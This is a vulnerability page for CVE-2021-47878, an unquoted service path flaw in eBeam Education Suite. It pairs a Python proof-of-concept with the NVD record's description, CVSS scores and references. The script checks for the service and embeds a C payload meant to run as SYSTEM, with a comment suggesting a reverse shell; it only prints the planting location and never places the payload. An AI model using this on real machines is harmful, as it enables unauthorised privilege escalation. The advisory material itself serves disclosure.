CVE-2021-47878

# CVE-2021-47878 PoC - eBeam Device Service Unquoted Service Path # This PoC demonstrates how to exploit the unquoted service path vulnerability # to gain SYSTEM level code execution import os import subprocess import shutil def check_vulnerable_service(): """Check if eBeam Device Service exists and has unquoted path""" try: result = subprocess.run( ['sc', 'qc', 'eBeam Device Service'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: path_line = [l for l in result.stdout.split('\n') if 'BINARY_PATH' in l] if path_line: print(f"Service path: {path_line[0]}") return True except: pass return False def create_malicious_executable(): """Create malicious executable to be placed in unquoted path""" # In real attack, this would be a reverse shell or other payload malicious_code = ''' #include <windows.h> #include <stdlib.h> int main() { // Add your malicious code here // This runs as SYSTEM when service starts system("cmd.exe /c whoami > C:\\temp\\pwned.txt"); return 0; } ''' print("Malicious executable would be created at path like:") print("C:\\Program Files\\eBeam\\Device.exe") print("When service starts, this will be executed as SYSTEM") def main(): print("CVE-2021-47878 PoC - eBeam Device Service Unquoted Service Path") print("=" * 60) if check_vulnerable_service(): print("[+] eBeam Device Service found with unquoted path!") create_malicious_executable() else: print("[-] Target service not found or not vulnerable") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2021-47878", "sourceIdentifier": "[email protected]", "published": "2026-01-21T18:16:21.450", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "eBeam Education Suite 2.5.0.9 contains an unquoted service path vulnerability in the eBeam Device Service that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious code that would execute with LocalSystem privileges during service startup."}, {"lang": "es", "value": "eBeam Education Suite 2.5.0.9 contiene una vulnerabilidad de ruta de servicio sin comillas en el Servicio de Dispositivos eBeam que permite a usuarios locales ejecutar código potencialmente con privilegios elevados. Los atacantes pueden explotar la ruta sin comillas en la configuración del servicio para inyectar código malicioso que se ejecutaría con privilegios de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "http://esvc000385.wic045u.server-web.com/Downloads/eBeam/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49647", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ebeam-education-suite-ebeam-device-service-unquoted-service-path", "source": "[email protected]"}]}}